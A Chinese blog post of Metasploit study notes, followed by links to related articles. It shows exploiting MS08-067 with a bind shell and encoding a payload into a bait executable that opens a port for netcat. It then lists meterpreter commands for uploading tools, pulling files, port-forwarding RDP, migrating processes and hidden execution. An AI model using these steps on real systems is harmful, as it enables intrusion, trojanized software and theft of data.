【Metasploit总结】之【payload】

最新推荐文章于 2025-05-15 11:59:54 发布
最新推荐文章于 2025-05-15 11:59:54 发布
阅读量1.4k 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/111057570
本文介绍在发现漏洞后如何选择和使用payload,包括典型payload的选择、编码以避免“坏字符”的出现,以及如何生成定制payload。此外还介绍了meterpreter的基本命令和一些常用的文件系统、网络及系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

payload

发现漏洞后,如何选择payload。

典型payload

  • 使用exploit
msf6 > use exploit/windows/smb/ms08_067_netapi
  • 查看当前漏洞可利用payload
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
  • 查看payload信息
msf6 exploit(windows/smb/ms08_067_netapi) > info windows/shell/bind_tcp
  • 使用payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/bind_tcp

生成定制payload

  • 选择payload
msf6 exploit(windows/smb/ms08_067_netapi) > use windows/shell/bind_tcp
  • 编码
    避免“坏字符”。
    查看可使用编码方式:
msf6 payload(windows/shell/bind_tcp) > show encoders

尽量使用excellent的编码:

msf6 payload(windows/shell/bind_tcp) > generate -e cmd/powershell_base64 -i 2 -n 14 -o /root/Desktop/myPayload
# -e选择编码方式,-i编码次数,-o输出路径,-n增加14个“空命令”
# 也可以与一个exe查询绑定,当目标主机运行被绑定payload的程序后目标4444端口会被开放,可使用命令“nc <targetIP> 4444”连接:
msf6 payload(windows/shell_bind_tcp) > generate -e cmd/powershell_base64 -t exe -i 5 -k -x /root/Desktop/bait.exe -f /root/Desktop/bait_with_payload.exe

meterpreter payload

https://blog.csdn.net/qq_44874645/article/details/109544192

基本命令

background
# 保存会话,返回msfconsole

session
# 查看所有会话,进入会话:session -i <session id>

quit
# 关闭当前会话

shell
# 会话下使用,获取shell

文件系统命令

cat
# 查看文件内容

getwd
# 查看当前在目标的工作目录

upload nc.exe c:\
# 上传文件,-r上传目录

download c:\\nc.exe
# 下载文件,双斜杠需转移

edit c:\\windows\\system32\\drivers\\etc\\hosts
# 对文件进行编辑

search -d c:\\ -f *.mdb
# 搜索文件

网络命令

ipconfig

portwd add -l 1234 -p 3389 -r 192.168.1.131
# 端口转发,例:目标端口只允许内网访问3389,那么可用此条命令将其3389端口转发到本地,实现本地访目标3389端口
# -l本地端口发放,-r目标ip

route
# 路由信息

系统命令

ps
# 查看进程

migrate <pid>
# 将meterpreter会话转移到其它稳定进程,如explorer.exe

execute -H -i -f cmd.exe
# 在目标上隐藏执行cmd

getpid
# 获取当前meterpreter注入进程的pid

kill <pid>
# 结束指定进程

get uid
# 获得用户名,从而查看权限

sysinfo
# 系统信息

shutdown
# 关机
Metasploit 载荷(Payloads)使用详解
悦分享
11-23 802
payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称为shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1402
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4707
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
Payload的定义及核心概念
最新发布
神棍之路
05-15 2228
在IT领域,Payload(有效载荷) 是数据传输或操作中承载实际功能或信息的主体部分,与协议头、元数据等辅助内容区分。其主要应用场景包括网络通信、恶意软件、API开发及渗透测试。在网络通信中,Payload是数据包中除去协议头部的实际内容,如HTTP请求体或TCP/IP封装的上层协议。在恶意软件中,Payload是执行核心操作的代码,如勒索软件加密文件或木马窃取数据。在API开发中,Payload是接口调用时传递的参数或数据对象,常见格式为JSON、XML等。在渗透测试中,Payload用于建立远程控制或
metasploit payload模块介绍
热门推荐
星落的博客
05-19 1万+
generate命令介绍 -b 过滤坏字符 '\x00,\xff' -e 指定将要使用的加密技术(show encoder查看加密模块) -f 指定输出文件格式 -h 查看帮助信息 -i 设置加密payload的次数 -k 提高速度 -x 指定自定义可执行文件作为模板 -o 设置输出文件名称 实例演示-生成木马 1.查看metasploit集成的payload show payload 2.使用反弹的payload use payload windows/shell...
Metasploit Framework —— Payload
KAKA的博客
07-09 378
这里也是直接以练习为主,学习如何使用 payload: !!! 附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode !!! 这里我起初用的 payloadpayload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/re
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1920
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
metasploit 如何生成 payload
05-25
Metasploit是一个广泛使用的渗透测试框架,可以用于生成各种类型的payload。它提供了多种生成payload的模块,如下所示: 1. `msfvenom`命令:该命令可以生成各种类型的payload,包括反向Shell、Meterpreter Shell、...
Kali linux 学习笔记(九十二)metasploit framework——payload 2020.4.25
闵行小鱼塘
04-27 826
使用exploit是为了将payload在目标机上执行
Metasploit深入:Payload编写与定制
Metasploit是一个先进的渗透测试工具,而Payload则是其核心功能之一。本章将带您深入理解Payload的基本概念,探索其在Metasploit中的作用,并通过实例演示快速体验Payload的使用与编写。 ## 理解Payload及其在...
android-metasploit:修改当前的metasploit-javapayload,在payload前面包含一个“小游戏”,用于演示目的
06-30
Metasploit(包括Java Meterpreter)编译JavaPayload,你需要Maven 3.0或更高版本。 赶紧跑 mvn package 打包所有文件,或 mvn -P deploy package 打包所有文件并将它们复制到 Metasploit 的正确位置( ../...
Metasploit payloads模块理解
weixin_45626840的博客
03-16 1508
Metasploit 通过规范化 exploit 和 shellcode 之间的接口把漏洞利用的过程封装成易用的模块, 大大减少了 expliot 开发过程中的重复工作, 深刻体现了代码重用和模块化、结构化的思想。植入代码之前需要做大量的调试工作,例如,弄清楚程序有几个输入点,这些输入将最终会当作哪个函数的第几个参数读入到内存的哪一个区域,哪一个输入会造成栈溢出,在复制到栈区的时候对这些数据有没有额外的限制等。exploit 的核心是淹没返回地址, 劫持进程的控制权, 之后跳转去执行 shellcode。
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 6020
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
MetaSploit常用漏洞payload网址
一杯咖啡的渗透记忆
05-21 1030
http://www.rapid7.com/db/searchhttp://www.exploit-db.com/search/http://osvdb.org/search/advsearch
深入理解metasploitpayload
蚁景网安学院
04-03 793
Metasploit- Payload简单来说,Payload是黑客用来与被黑了的系统交互的简单脚本。使用payload,可以将数据传输到已经沦陷的系统。Metasploit有效载荷可以...
msf中如何选择payload,这里给你解释
weixin_44270509的博客
08-09 4747
Metasploit中的 Payload 模块一。类型(三种基础的)二。名称和格式三。 Stager中几种常见的payload(metepreter为主) 因为有一阵子天天弄不清楚到底选择哪个payload而感觉脑壳痛,所以查了很多资料,我大致在这里总结一下 一。类型(三种基础的) 1-Single: 是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系...
Metasploit framework(三)——exploit模块及payload模块独立实战
Jeromeyoung
03-26 1284
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 首先说exploit模块及其实战效果: 1、Active exploit (主动) 触发方式:攻击...
如何查看chrome里network的payload
宝安小雨
03-19 3017
如何查看chrome的network的请求payload,点击漏斗形状的过滤器,过滤框清空,表示检测所有,右边按钮点击“全部”,“第三方请求”不要勾选。
如何判断 MSFPayload 是 Staged 还是 Stageless(含 Meterpreter 与普通 Shell 对比)
vortex5的博客
03-20 1102
在渗透测试领域,Metasploit Framework(MSF)的msfvenom工具是生成 Payload(载荷)的核心利器。然而,当我们选择 Payload 时,经常会遇到一个问题:这个 Payload 是还是?更进一步,即使我们明白了这两者的区别,它们是否都代表 Meterpreter?Meterpreter 又与普通的 Shell 有何不同?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值